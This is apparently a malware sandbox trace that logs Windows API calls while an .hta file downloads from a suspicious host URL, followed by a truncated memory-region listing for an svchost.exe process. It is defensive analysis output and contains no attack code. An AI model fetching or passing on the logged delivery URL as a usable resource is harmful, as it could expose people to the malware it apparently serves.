[0067.010] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\t[1].hta", pBuffer=0x2d5e990, cbSize=0xc8, pwzMimeProposed="application/hta", dwMimeFlags=0x6, ppwzMimeOut=0x2d5e938, dwReserved=0x0 | out: ppwzMimeOut=0x2d5e938*="application/hta") returned 0x0
[0067.011] CoTaskMemFree (pv=0x3792c0)
[0067.011] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pSecMgr=0x0) returned 0x1
[0067.011] StrCmpNIW (lpStr1="applic", lpStr2="image/", nChar=6) returned -1
[0067.011] GetCurrentThreadId () returned 0xbf0
[0067.011] SetEvent (hEvent=0x210) returned 1
[0067.011] GetCurrentThreadId () returned 0xbf0
[0067.011] MulDiv (nNumber=3312, nNumerator=4000, nDenominator=3313) returned 3999
[0067.011] PostMessageW (hWnd=0x10204, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
Thread:
id = 44
os_tid = 0xbf4
[0063.841] GetCurrentThreadId () returned 0xbf4
Thread:
id = 45
os_tid = 0xbf8
[0063.842] GetCurrentThreadId () returned 0xbf8
Thread:
id = 65
os_tid = 0x80c
[0064.081] GetCurrentThreadId () returned 0x80c
Thread:
id = 66
os_tid = 0x81c
[0064.095] GetCurrentThreadId () returned 0x81c
Thread:
id = 68
os_tid = 0x83c
[0064.177] GetCurrentThreadId () returned 0x83c
[0064.177] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x7fee0880000
[0064.178] CoInitialize (pvReserved=0x0) returned 0x0
[0064.178] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x927c0) returned 0x0
[0067.011] GetTickCount () returned 0x2003e
[0067.011] IInternetProtocolRoot:Terminate (This=0x355f00, dwOptions=0x0) returned 0x0
[0067.011] IUnknown:Release (This=0x3524b8) returned 0x7
[0067.011] IUnknown:Release (This=0x3524b8) returned 0x6
[0067.011] IUnknown:Release (This=0x3524c0) returned 0x5
[0067.011] IUnknown:Release (This=0x3524b0) returned 0x4
[0067.011] IUnknown:Release (This=0x352530) returned 0x3
[0067.011] IUnknown:Release (This=0x352530) returned 0x2
[0067.012] GetCurrentThreadId () returned 0x83c
[0067.031] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x386f00, cbMultiByte=3313, lpWideCharStr=0x387f18, cchWideChar=3313 | out: lpWideCharStr="") returned 3313
[0067.031] IUnknown:AddRef (This=0x30e180) returned 0x11
[0067.031] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x33cf510 | out: lpCPInfo=0x33cf510) returned 1
[0067.031] IUnknown:AddRef (This=0x324ce0) returned 0x4
[0067.031] IUnknown:AddRef (This=0x30e180) returned 0x12
[0067.032] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x33cf550 | out: ppvObject=0x33cf550*=0x30e180) returned 0x0
[0067.032] IUnknown:Release (This=0x30e180) returned 0x12
[0067.032] IUnknown:AddRef (This=0x30e180) returned 0x13
[0067.032] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x33cf580 | out: pdwScheme=0x33cf580*=0x2) returned 0x0
[0067.032] IUnknown:Release (This=0x30e180) returned 0x12
[0067.032] PostMessageW (hWnd=0x10204, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0067.032] GetTickCount () returned 0x2004e
[0067.032] GetTickCount () returned 0x2004e
[0067.033] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x927c0) returned 0x0
[0083.806] GetTickCount () returned 0x240e6
[0083.806] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x927c0) returned 0x0
[0084.544] CoUninitialize ()
[0084.544] FreeLibraryAndExitThread (hLibModule=0x7fee0880000, dwExitCode=0x0)
[0084.545] GetCurrentThreadId () returned 0x83c
Thread:
id = 70
os_tid = 0x864
[0064.228] GetCurrentThreadId () returned 0x864
Thread:
id = 73
os_tid = 0x7b0
[0066.805] GetCurrentThreadId () returned 0x7b0
Thread:
id = 77
os_tid = 0x518
[0067.457] GetCurrentThreadId () returned 0x518
[0067.553] GetCurrentThreadId () returned 0x518
Process:
id = "6"
image_name = "svchost.exe"
filename = "c:\\windows\\system32\\svchost.exe"
page_root = "0x8722000"
os_pid = "0x3dc"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "5"
os_parent_pid = "0xbc8"
cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Local Service"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cd00" [0xc000000f], "LOCAL" [0x7]
Region:
id = 989
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 990
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 991
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 992
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 993
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 994
start_va = 0xc0000
end_va = 0xc1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 995
start_va = 0xd0000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 996
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 997
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 998
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 999
start_va = 0x180000
end_va = 0x18ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 1000
start_va = 0x190000
end_va = 0x1a0fff
entry_point = 0x190000
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1001
start_va = 0x1b0000
end_va = 0x2affff
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 1002
start_va = 0x2b0000
end_va = 0x3affff
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 1003
start_va = 0x3b0000
end_va = 0x537fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 1004
start_va = 0x540000
end_va = 0x6c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 1005
start_va = 0x6d0000
end_va = 0x78ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 1006
start_va = 0x790000
end_va = 0xb82fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 1007
start_va = 0xb90000
end_va = 0xb93fff
entry_point = 0xb90000
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 1008
start_va = 0xba0000
end_va = 0xba1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ba0000"
filename = ""
Region:
id = 1009
start_va = 0xbb0000
end_va = 0xbb0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000bb0000"
filename = ""
Region:
id = 1010
start_va = 0xc30000
end_va = 0xc30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c30000"
filename = ""
Region:
id = 1011
start_va = 0xc50000
end_va = 0xccffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000c50000"
filename = ""
Region:
id = 1012
start_va = 0xd10000
end_va = 0xd8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000d10000"
filename = ""
Region:
id = 1013
start_va = 0xda0000
end_va = 0xe1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000da0000"
filename = ""
Region:
id = 1014
start_va = 0xe20000
end_va = 0xe9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 1015
start_va = 0xeb0000
end_va = 0xf2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000eb0000"
filename = ""
Region:
id = 1016
start_va = 0xf30000
end_va = 0x11fefff
entry_point = 0xf30000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1017
start_va = 0x1200000
end_va = 0x12fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001200000"
filename = ""
Region:
id = 1018
start_va = 0x1300000
end_va = 0x137ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001300000"
filename = ""
Region:
id = 1019
start_va = 0x13b0000
end_va = 0x142ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000013b0000"
filename = ""
Region:
id = 1020
start_va = 0x1430000
end_va = 0x152ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001430000"
filename = ""
Region:
id = 1021
start_va = 0x15b0000
end_va = 0x162ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015b0000"
filename = ""
Region:
id = 1022
start_va = 0x16a0000
end_va = 0x16affff
entry_point = 0x0
region_type = private
name = "private_0x00000000016a0000"
filename = ""
Region:
id = 1023
start_va = 0x1760000
end_va = 0x17dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001760000"
filename = ""
Region:
id = 1024
start_va = 0x17e0000
end_va = 0x185ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017e0000"
filename = ""
Region:
id = 1025
start_va = 0x18d0000
end_va = 0x194ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000018d0000"
filename = ""
Region:
id = 1026
start_va = 0x19f0000
end_va = 0x1a6ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000019f0000"
filename = ""
Region:
id = 1027
start_va = 0x1a90000
end_va = 0x1b0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a90000"
filename = ""
Region:
id = 1028
start_va = 0x1b10000
end_va = 0x1c0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b10000"
filename = ""
Region:
id = 1029
start_va = 0x1cc0000
end_va = 0x1ccffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001cc0000"
filename = ""
Region:
id = 1030
start_va = 0x1d40000
end_va = 0x1dbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d40000"
filename = ""
Region:
id = 1031
start_va = 0x1dc0000
end_va = 0x1e7ffff
entry_point = 0x1dc0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1032
start_va = 0x1f10000
end_va = 0x1f8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f10000"
filename = ""
Region:
id = 1033
start_va = 0x1ff0000
end_va = 0x206ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ff0000"
filename = ""
Region:
id = 1034
start_va = 0x2150000
end_va = 0x215ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 1035
start_va = 0x2160000
end_va = 0x235ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002160000"
filename = ""
Region:
id = 1036
start_va = 0x23b0000
end_va = 0x242ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 1037
start_va = 0x2500000
end_va = 0x257ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 1038
start_va = 0x741b0000
end_va = 0x741b2fff
entry_point = 0x741b0000
region_type = mapped_file
name = "sfc.dll"
filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")
Region:
id = 1039
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1040
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1041
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1042
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1043
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1044
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1045
start_va = 0xff9e0000
end_va = 0xff9eafff
entry_point = 0xff9e0000
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1046
start_va = 0x7fef3b90000
end_va = 0x7fef3c67fff
entry_point = 0x7fef3b90000
region_type = mapped_file
name = "perftrack.dll"
filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll")
Region:
id = 1047
start_va = 0x7fef3c70000
end_va = 0x7fef3c7bfff
entry_point = 0x7fef3c7602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1048
start_va = 0x7fef46d0000
end_va = 0x7fef46d7fff
entry_point = 0x7fef46d1414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1049
start_va = 0x7fef5c60000
end_va = 0x7fef5cdbfff
entry_point = 0x7fef5c60000
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 1050
start_va = 0x7fef5f90000
end_va = 0x7fef5f9ffff
entry_point = 0x7fef5f90000
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 1051
start_va = 0x7fef5fa0000
end_va = 0x7fef5fb1fff
entry_point = 0x7fef5fa0000
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 1052
start_va = 0x7fef6640000
end_va = 0x7fef6658fff
entry_point = 0x7fef6640000
region_type = mapped_file
name = "wdi.dll"
filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")
Region:
id = 1053
start_va = 0x7fef6660000
end_va = 0x7fef66d3fff
entry_point = 0x7fef66666f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1054
start_va = 0x7fef6700000
end_va = 0x7fef6763fff
entry_point = 0x7fef6701254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1055
start_va = 0x7fef6770000
end_va = 0x7fef67e0fff
entry_point = 0x7fef6771010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1056
start_va = 0x7fefaf90000
end_va = 0x7fefaf9afff
entry_point = 0x7fefaf912e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 1057
start_va = 0x7fefafa0000
end_va = 0x7fefafb8fff
entry_point = 0x7fefafa177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 1058
start_va = 0x7fefafc0000
end_va = 0x7fefafd4fff
entry_point = 0x7fefafc12a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 1059
start_va = 0x7fefb180000
end_va = 0x7fefb197fff
entry_point = 0x7fefb181130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1060
start_va = 0x7fefbc30000
end_va = 0x7fefbc47fff
entry_point = 0x7fefbc31bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1061
start_va = 0x7fefbc50000
end_va = 0x7fefbc60fff
entry_point = 0x7fefbc516ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1062
start_va = 0x7fefbc80000
end_va = 0x7fefbcd2fff
entry_point = 0x7fefbc82b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1063
start_va = 0x7fefbdb0000
end_va = 0x7fefbdb9fff
entry_point = 0x7fefbdb0000
region_type = mapped_file
name = "nsisvc.dll"
filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll")
Region:
id = 1064
start_va = 0x7fefbdd0000
end_va = 0x7fefbddafff
entry_point = 0x7fefbdd1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1065
start_va = 0x7fefbde0000
end_va = 0x7fefbe06fff
entry_point = 0x7fefbde98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1066
start_va = 0x7fefbe50000
end_va = 0x7fefbeb6fff
entry_point = 0x7fefbe66060
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1067
start_va = 0x7fefbef0000
end_va = 0x7fefbefbfff
entry_point = 0x7fefbef0000
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1068
start_va = 0x7fefbf70000
end_va = 0x7fefbf84fff
entry_point = 0x7fefbf760d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1069
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1070
start_va = 0x7fefc9e0000
end_va = 0x7fefc9e6fff
entry_point = 0x7fefc9e14b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1071
start_va = 0x7fefcad0000
end_va = 0x7fefcaeafff
entry_point = 0x7fefcad0000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1072
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
entry_point = 0x7fefcaf13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1073
start_va = 0x7fefcc40000
end_va = 0x7fefcc49fff
entry_point = 0x7fefcc43cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 1074
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1075
start_va = 0x7fefce60000
end_va = 0x7fefcebafff
entry_point = 0x7fefce66940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1076
start_va = 0x7fefcfd0000
end_va = 0x7fefcfd6fff
entry_point = 0x7fefcfd142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1077
start_va = 0x7fefcfe0000
end_va = 0x7fefd034fff
entry_point = 0x7fefcfe1054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1078
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1079
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1080
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1081
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1082
start_va = 0x7fefd650000
end_va = 0x7fefd6e0fff
entry_point = 0x7fefd651440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1083
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1084
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1085
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1086
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1087
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1088
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1089
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1090
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1091
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1092
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1093
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1094
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1095
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1096
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1097
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1098
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1099
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1100
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1101
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1102
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 1103
start_va = 0x7fffff9e000
